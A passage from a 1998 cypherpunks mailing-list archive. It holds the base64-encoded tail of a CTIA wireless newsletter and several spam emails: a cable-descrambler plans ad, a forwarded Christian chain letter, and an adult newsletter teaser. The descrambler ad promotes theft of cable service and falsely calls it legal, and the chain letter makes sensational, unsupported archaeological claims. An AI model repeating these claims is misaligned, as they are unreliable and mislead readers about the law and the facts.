SFJFRj0iaHR0cDovL3d3dy5mY2MuZ292L0J1cmVhdXMvV2lyZWxlc3MvTmV3
c19SZWxlYXNlcy8xOTk4L25yd2w4MDM5Lmh0bWwiPkZDQzwvQT4pCig8QSBI
UkVGPSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJhcnkvdGVjaC85OC8w
OS9iaXp0ZWNoL2FydGljbGVzLzE0ZGF0YS5odG1sIj5OWVRJTUVTPC9BPikK
KDxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy9idXNp
bmVzcy9zdG9yeS8xNDk4Ni5odG1sIj5XSVJFRDwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNw
cmludCBQQ1MgT2ZmZXJzIFRhbGtpbmcKQ2VsbCBQaG9uZTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5TYW1zdW5nJ3Mg
bmV3IFNDSC0yMDAwIENlbGwgUGhvbmUgdGFsa3MKdG8gaXRzIHVzZXJzIHZp
YSBhIGZlbWFsZSB2b2ljZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGlu
Z3RvbnBvc3QuY29tL3dwLXNydi9XUGxhdGUvMTk5OC0wOS8xNC8wMThsLTA5
MTQ5OC1pZHguaHRtbCI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQg
UGxhbnMgVG8gQW5ub3VuY2UKTmV3IFRlY2hub2xvZ3kgRm9yIFBob25lIENv
bXBhbmllczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5MdWNlbnQncyBJbnRlbGxpZ2VudCBOZXR3b3JrIFBsYXRmb3Jt
CndpbGwgaW50ZXJmYWNlIElOIE1lc3NhZ2luZyB3aXRoIGUtbWFpbCwgdm9p
Y2UtbWFpbCBhbmQgd2lyZWxlc3Mgb2ZmZXJpbmcKbmV3IG1lc3NhZ2luZyBz
ZXJ2aWNlcyBhbmQgZWFzaWVyIG5hdmlnYXRpb24uICg8QSBIUkVGPSJodHRw
Oi8vd3d3LnpkbmV0LmNvbS9pbnR3ZWVrL2RhaWx5Lzk4MDkxNGguaHRtbCI+
WkRORVQ8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5TZWxlY3RpbmcgV2lyZWxlc3MgU2Vydmlj
ZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5IZWxwZnVsIGhpbnRzIG9uIHNlYXJjaGluZyBmb3Igd2lyZWxlc3MKc2Vy
dmljZSBvbiB0aGUgd2ViLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5zbWFydG1v
bmV5LmNvbS9hYy9iZXN0YnV5cy9jb21tdW5pY2F0aW9ucy9pbmRleC5jZm0/
c3Rvcnk9Y2VsbHByb3ZpZGVyIj5TTUFSVDwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkludmVz
dG9ycyBXYXJ5IE9mIENhbmFkYSdzCk1vYmlsZSBQaG9uZSBTZXJ2aWNlPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlJl
Y2VudCBkZWNsaW5lIGluIENhbmFkYSdzIG1vYmlsZSBwaG9uZQpvcGVyYXRv
cnMnIHNoYXJlcywgaGFzIGRldGVycmVkIGludmVzdG9ycyBmcm9tIHRoZSBp
bmR1c3RyeS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudGhlZ2xvYmVhbmRtYWls
LmNvbS9kb2NzL25ld3MvMTk5ODA5MTQvUk9CRnJvbnQvcm91dGwuaHRtbCI+
R0xPQkU8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5UYW1wYSBCYXkgRXhlY3V0aXZlIEFpcnBv
cnQKaW4gT2Rlc3NhIFdhbnRzIENlbGwgVG93ZXIgTGltaXRzPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNvbnN0cnVj
dGlvbiBvZiBmaXZlIG5ldyB0b3dlcnMgd2l0aGluCjUgbWlsZXMgb2YgVGFt
cGEncyBhaXJwb3J0IGhhcyBzcGFya2VkIGNvbmNlcm5zIGJ5IGFpcnBvcnQg
bWFuYWdlbWVudC4KKDxBIEhSRUY9Imh0dHA6Ly93d3cudGFtcGF0cmliLmNv
bS9uZXdzL3Bhc2NvLmh0bSI+VEFNUEE8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5XYXZlUmlk
ZXIgQ29tbXVuaWNhdGlvbnMKSW50cm9kdWNlcyBXaXJlbGVzcyBNb2RlbXMg
YW5kIEludGVybmV0IEFjY2VzcyBTZXJ2aWNlPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoaXMgc21hbGwgQ2FuYWRp
YW4gc3RhcnR1cCBzYXlzIGl0cyBuZXcKd2lyZWxlc3Mgc2VydmljZXMgY3V0
IGNvc3RzIGZvciBJU1BzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy53aXJlZC5j
b20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE0OTc3Lmh0bWwiPldJUkVE
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+Tm9ydGVsIGFuZCBXaXJlbGVzcyBJSQpXaWxsIFBy
b3ZpZGUgQ0RNQSBTZXJ2aWNlIHRvIFJ1cmFsIE5lYnJhc2thPC9GT05UPjwv
Rk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkluIGEgdGhy
ZWUgeWVhciwgVVMkNCBtaWxsaW9uIGNvbnRyYWN0LApOb3J0ZWwgKE5vcnRo
ZXJuIFRlbGVjb20pIChOWVNFOiBOVC9UU0U6IE5UTCkgd2lsbCBzdXBwbHkg
V2lyZWxlc3MgSUksCkwuTC5DIHdpdGggc3dpdGNoaW5nIGFuZCBiYXNlIHN0
YXRpb24gZXF1aXBtZW50IHRoYXQgd2lsbCBwcm92aWRlIGZpeGVkCmFuZCBt
b2JpbGUgdGVsZXBob25lIHNlcnZpY2UgdXNpbmcgY2RtYU9uZSAoSVMtOTUg
Q0RNQSkgZGlnaXRhbCB3aXJlbGVzcwp0ZWNobm9sb2d5LiAoPEEgSFJFRj0i
aHR0cDovL3d3dy5wcm5ld3N3aXJlLmNvbS9jZ2ktYmluL3N0b3JpZXMucGw/
QUNDVD0xMDQmU1RPUlk9L3d3dy9zdG9yeS8wOS0xNC0xOTk4LzAwMDA3NTAw
ODcmRURBVEU9Ij5QUk5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5BaXJvbmV0IFdpcmVs
ZXNzIENvbW11bmljYXRpb25zClNlbGVjdGVkIGFzIFByZWZlcnJlZCBXaXJl
bGVzcyBMQU4gVmVuZG9yIGJ5IE1vbmFyY2ggTWFya2luZyBTeXN0ZW1zPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkFp
cm9uZXQgV2lyZWxlc3MgQ29tbXVuaWNhdGlvbnMgSW5jLiwKYSBsZWFkaW5n
IHByb3ZpZGVyIG9mIHdpcmVsZXNzIExBTiBzb2x1dGlvbnMsIGFubm91bmNl
ZCB0b2RheSB0aGF0IE1vbmFyY2gKTWFya2luZyBTeXN0ZW1zIChEYXl0b24s
IE9IKSwgdGhlIHdvcmxkd2lkZSBsZWFkZXIgaW4gaWRlbnRpZmljYXRpb24s
IHByaWNpbmcKYW5kIHRyYWNraW5nIHNvbHV0aW9ucywgc2VsZWN0ZWQgQWly
b25ldCBhcyB0aGVpciB3aXJlbGVzcyBMb2NhbCBBcmVhIE5ldHdvcmsKKExB
TikgdmVuZG9yIG9mIGNob2ljZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cucHJu
ZXdzd2lyZS5jb20vY2dpLWJpbi9zdG9yaWVzLnBsP0FDQ1Q9MTA0JlNUT1JZ
PS93d3cvc3RvcnkvMDktMTQtMTk5OC8wMDAwNzQ5OTk3JkVEQVRFPSI+UFJO
RVdTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+RG9uIFdhcmtlbnRpbiBSZS1FbGVjdGVkCkNo
YWlyIG9mIEdTTSBBbGxpYW5jZTs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5C
b2IgQnJvd24gTmFtZWQgU2VjcmV0YXJ5L1RyZWFzdXJlcjwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgTm9ydGgg
QW1lcmljYW4gR1NNIEFsbGlhbmNlIEwuTC5DLgphbm5vdW5jZWQgdG9kYXkg
dGhhdCBEb24gV2Fya2VudGluLCBQcmVzaWRlbnQgYW5kIENoaWVmIEV4ZWN1
dGl2ZSBPZmZpY2VyCm9mIEFlcmlhbCBDb21tdW5pY2F0aW9ucywgSW5jLiwg
aGFzIGJlZW4gcmUtZWxlY3RlZCBDaGFpcm1hbiBvZiB0aGUgQWxsaWFuY2Uu
Jm5ic3A7CkluIGFkZGl0aW9uLCBCb2IgQnJvd24sIERpcmVjdG9yIG9mIHRo
ZSBHU00gQWxsaWFuY2UsIHdhcyBuYW1lZCB0byBzZXJ2ZQphcyB0aGUgZ3Jv
dXAncyBTZWNyZXRhcnkgYW5kIFRyZWFzdXJlci4gKDxBIEhSRUY9Imh0dHA6
Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9i
b2R5X25ld3MuY2ZtP05FV1NfSUQ9MzQxMSI+V09XLUNPTTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPkZpcnN0IFJlcG9ydGVkIFNldHRsZW1lbnQKb2YgWWVhciAyMDAwIENv
bXB1dGVyIExpdGlnYXRpb248L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VGVjIEFtZXJpY2Egb2YgQXRsYW50YSBzZXR0
bGVkIHdpdGggUHJvZHVjZQpQYWxhY2UgSW50ZXJuYXRpb25hbCBmb3IgJDI1
MCwwMDAuICg8QSBIUkVGPSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJh
cnkvdGVjaC85OC8wOS9iaXp0ZWNoL2FydGljbGVzLzE0c3VpdC5odG1sIj5O
WVRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+QmVsbFNvdXRoIFBsYW5zIFRvIEJpbGwK
SW50ZXJuZXQgUHJvdmlkZXJzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkJlbGxTb3V0aCBDb3JwLiBpcyB0aHJlYXRl
bmluZyB0byBjaGFyZ2UKSW50ZXJuZXQgc2VydmljZSBwcm92aWRlcnMgYW5k
IG90aGVyIHNwZWNpYWxpemVkIGNhcnJpZXJzIGxvbmctZGlzdGFuY2UKYWNj
ZXNzIGZlZXMgZm9yIHVzaW5nIHRoZSBJbnRlcm5ldCB0byBjYXJyeSBsb25n
LWRpc3RhbmNlIHRlbGVwaG9uZSB2b2ljZQp0cmFmZmljLiAoPEEgSFJFRj0i
aHR0cDovL3d3dy5sYXRpbWVzLmNvbS9IT01FL05FV1MvQlVTSU5FU1MvdDAw
MDA4MzU4Mi4xLmh0bWwiPkxBVElNRVM8L0E+KQooPEEgSFJFRj0iaHR0cDov
L3d3dy53aXJlZC5jb20vbmV3cy9uZXdzL2J1c2luZXNzL3N0b3J5LzE0OTg5
Lmh0bWwiPldJUkVEPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRk
aXRpb25hbCBuZXdzIGFib3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5j
bHVkaW5nIHBlcmlvZGljIG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBk
YXktLXZpc2l0CjxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0
dHA6Ly93d3cud293LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJ
RFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0tMT5DVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5z
bWl0dGVkIHdlZWtkYXlzLCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1
cyBvbiB0aGUgV29ybGQgV2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3
dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNv
bS5jb20vcHJvZmVzc2lvbmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZu
YnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPS0xPklmIHlvdSBhcmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5n
IHRoZSBDVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2Vu
ZCBhIG1lc3NhZ2UgdG8KPEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0Rh
aWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5
X05ld3NAdW0yLnVuaXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZP
TlQ+Jm5ic3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWls
eV9OZXdzQHVtMi51bml0eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0
aGUgVE8gc2VjdGlvbiBvZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioq
PC9CPiZuYnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPS0xPlBsZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBp
biB0b2RheSdzIG5ld3MgYXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9z
ZSBsaW5rcyBtYXkgbm90IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMg
dGhyb3VnaG91dCB0aGUgZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291
cmNlcwptYXkgYmUgc3Vic2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVn
aXN0cmF0aW9uLjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+CjwvVEFCTEU+PC9DRU5URVI+Cgo8Q0VOVEVS
PiZuYnNwOzwvQ0VOVEVSPgoKPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 123456@usa.net
Date: Tue, 15 Sep 1998 00:03:20 -0700 (PDT)
To: 123458@qqeioweisssiiie.com
Subject: CABLE TV........FREE PREMIUM CHANNELS!!!
Message-ID: <199234233019.GAA08423@qqeioweisssiiie.com>
MIME-Version: 1.0
Content-Type: text/plain


THIS IS REALLY COOL!!!                   

              
            PREMIUM CHANNELS........No Monthly Bill!              

                                         


EASY to assemble plans for only $7.00 !
We will send your plans as soon as we receive payment for your order!


YOU WILL BE WATCHING PAY-PER-VIEW, HBO, SHOWTIME, 
THE MOVIE CHANNEL, Adult stations,
and any other scrambled signal   NEXT WEEK!

You can EASILY assemble a cable descrambler in less than 30 minutes!
You have probably seen many advertisments for similar plans....

 
** BUT OURS are BETTER! *** 

We have compared it to all the others and have actually
IMPROVED the quality and SIMPLIFIED the design !!!


**  We even include PHOTOS! **


OUR PLANS ARE BETTER! 
We have NEW, EASY TO READ,EASY to assemble plans for only $7.00! 
We have seen them advertised for as much as $29.00 and you have 
to wait weeks to receive them!       


WHAT THE OTHERS SAY IS TRUE!

Parts are available at  "The TV HUT"  or any electronics store.  
Trademark rights do not allow us to use a national electronics 
retail chains' name but there is one in your town!


Call and ask them BEFORE you order! 
They are very familiar with these plans and 
will tell you that it.......

       DOES INDEED WORK!    ASK THEM! 


You will need these easy to obtain parts :

 270-235                        mini box
 271-1325                      2.2k ohm resistor 
 278-212                        chasis connectors
 RG59 coaxial cable,
 #12 copper wire, 
 and a variable capacitor.


    

    All you need now is the EASY TO ASSEMBLE plans to
   show you how to assemble this money saving device in 30 MINUTES! 
 
 
 It is LEGAL, providing of course you use these
 plans for educational purposes only.

 IT'S FUN!  


We're sure you'll enjoy this!  Our FAMILIES sure do!                           
               * you need one descrambler for each TV.


                   NO MORE MONTHLY BILLS!           

           $  7.00     for plans only                        
            
             
              


Pay by check or money order payable to:           

 C Vogl           
 RR1 BOX 45           
 EFFORT, PA                               
 18330

Please provide a self addressed stamped envelope (.64)          

So we can RUSH your order to you!




This ad is being sent in compliance with Senate bill 1618, Title 3, section 301. http://www.senate.gov/~murkowski/commercialemail/S771index.html

Further transmissions to you by the sender of this email may be stopped at no cost to you by sending a reply to this email address with the word "remove" in the subject line.








































   If this E-mail offends anyone, we apologize ......and feel free to use the DEL key.










 "By deleting your unwanted EMail you waste one key stroke, yet by 
throwing away paper mail you waste a planet! SAVE OUR TREES and
 support internet EMail instead of traditional mail"! 
^^
:)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmessenger@30337.com
Date: Tue, 15 Sep 1998 14:07:43 -0700 (PDT)
To: j.messenger@mailcity.com
Subject: First Century Church
Message-ID: <First Century Church>
MIME-Version: 1.0
Content-Type: text/plain



Hello.

Jim and I received your name from a list given to us by a friend who
indicated that you may be interested in a unique Christian site in
Jerusalem (the Holy Land):  

http://jcr.org

The Jerusalem Christian Review is Jerusalem's leading Christian
newspaper, and reports discoveries in the Holy Land which have direct
implications on our understanding of the Bible.  

Their reports are well documented with pictures and the participation of
world-famous Bible scholars in Jerusalem.  Some of these discoveries
include:

- A First Century Jerusalem Tomb with an inscribed dedication to "Jesus,
who Ascended", dating to before the New Testament was written!

- A First Century Amulet found in the Holy Land which seem to depict
come of the Miracles of Jesus!

-- The recently found Palace of King David, including an exclusive
interview with the Hebrew University archaeologist who discovered it.

- A burial cave in Nazareth with the personal testimonials of the very
first Christians of Galilee.  

- Answers to the Mystery of Calvary. Scholars Find Stunning Evidence of
Jesus' Crucifixion at Golgotha!


Although we are not personally connected to this ministry, we were so
impressed with the impact of the information at this site that we felt
it was our duty to help spread the word.  It has helped us so much in
our own walk with the Lord and with evangelism!

We ask you to forward copies of this letter to all of your friends, so
that they can be informed of the dynamic way God is reaching back
through history and revealing Himself so dramatically to the world
today!

Take a look for yourself.  Again, the WWW address in Jerusalem is: 

  http://jcr.org

Yours in His service,

Jim and Barbara Randolph


P.  S.: We are attaching here part of a statement of mission taken from
the web site of the Jerusalem Christian Review, which is exciting!!  




--------------------------------------------------------------
Special Request:  PLEASE HELP SHARE THIS IMPORTANT EVIDENCE BY 
COPYING THIS MESSAGE AND SENDING IT TO YOUR FAMILY AND FRIENDS.  
THANK YOU.
_______________________________
***********************************************





>From the Editor:
>From the Past to the Present...
The Jerusalem Christian Review , a newspaper with a mission.

The very first Christians in the world were those who witnessed first
hand the Ministry, Words and deeds of Jesus of Nazareth.

They had a very unique opportunity - the opportunity to personally ask
Him questions, interact with Him and see for themselves the culmination
of His life on earth.

While these first witnesses can no longer testify to the events of the
past, their inscribed testimonials, some of which were buried for
two-thousand years, are only today being discovered and deciphered in
the Holy Land.

In recent years, unprecedented archaeological study and biblical
research has literally brought to life the very pages of the Bible.
Scholars in the Holy Land have unearthed startling discoveries which
reveal, in more clarity than ever in history, the world of the very
first followers of Jesus.

Today, one can physically walk in the footsteps of His disciples and
first apostles, sit in the very places where they were judged, witness
the spectacular nature of the cities they lived in and read the
inscriptions they left behind.

A cave found years ago by the renown French archaeologist, Charles
Clarmont-Ganneau, near ancient Bethany, exposed a first century tomb
which included three ossuaries (stone coffins) inscribed with the symbol
of the cross and the Hebrew names of Lazarus, Martha and Mary (John
11:1,2). 

In a nearby tomb, a monogrammed dedication written only a few years
after Jesus' crucifixion, also accompanied by a cross mark, was
deciphered by Prof. J. Finegan of the Pacific School of Religion,
Berkeley, to read: "Jesus Christ, the Redeemer."  

At the southern edge of the Kidron Valley, the "Valley of Judgement" in
Jerusalem, the Hebrew University archaeologist, Prof. Eleazar L.
Sukenik, discovered a first century ossuary with cross marks and a
testimonial reading: "[To] Jesus, the Lord." (For more information,
please see the Jerusalem Christian Review, Internet Edition, at
http://jcr.org.

Indeed, one cannot escape the inevitable conclusion that God is, today,
using the Holy Land and the accelerated study of archaeology to
substantiate the biblical narrative and to present a very modern message
to today's world.

The Jerusalem Christian Review,  Jerusalem's leading Christian
newspaper, invites you to join with us in prayer that, through the
information contained in these pages, many might come to the realization
that the Lord's Word is true.  

We invite you to take this opportunity to use the evidence being
presented in this edition, and in future editions, to be good stewards
of this message from the Holy Land - to tell your family and friends of
these testimonials, which carry from the past a very modern message to
the present and for the future. 


***********************************************




You can access the Jerusalem Christian Review in Jerusalem at: 

http://jcr.org


We ask you to help share the Word by passing this email message to your
family and friends.  Thank you.


















This email message has bee sent by S.P.Fox at the request of the
Randolfs who wish to say thanks to friends and loved ones without whose
advise and expertise, this mailing  would not be possible. I can be
reached c/o  230 West Hall Avenue,  PO Box 202
 Slidell, LA 70460

This is a first time and one time mailing from me, but if you wish, you
can be removed from my mailing list by sending an email with the word
Remove in the subject to:

no_no_thank@mailexcite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 15 Sep 1998 02:05:46 -0700 (PDT)
To: (STUFFED TUESDAY SEPTEMBER 15 1998)
Subject: READ THE FULL EXPLICIT CONTENTS OF THE STARR REPORT TODAY/PLUS CLINTON'S REBUTTAL!
Message-ID: <19980915071000.5544.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
 5 NEW SIZZLING STORIES
 HOW TO PEEL A PORN STAR'S PANTIES
 THE STAR REPORT IN FULL
 VIRGIN PENIS POLISHING
 BEER BASHING BOOBS
 STUFFED SPINS MTV'S 98 VID AWARDS
 ORGASMATRON
 THE BEST OF EUREKA
 CAMP CLINTON
 FERTILITY FINGERS FINGERED
 CLOSING THE DEAL
 THE ART OF LUST
             

       ---->   http://stuffed.net/98/9/15/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/15/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 15 Sep 1998 11:34:29 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 15, 1998
Message-ID: <199809151820.NAA05679@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
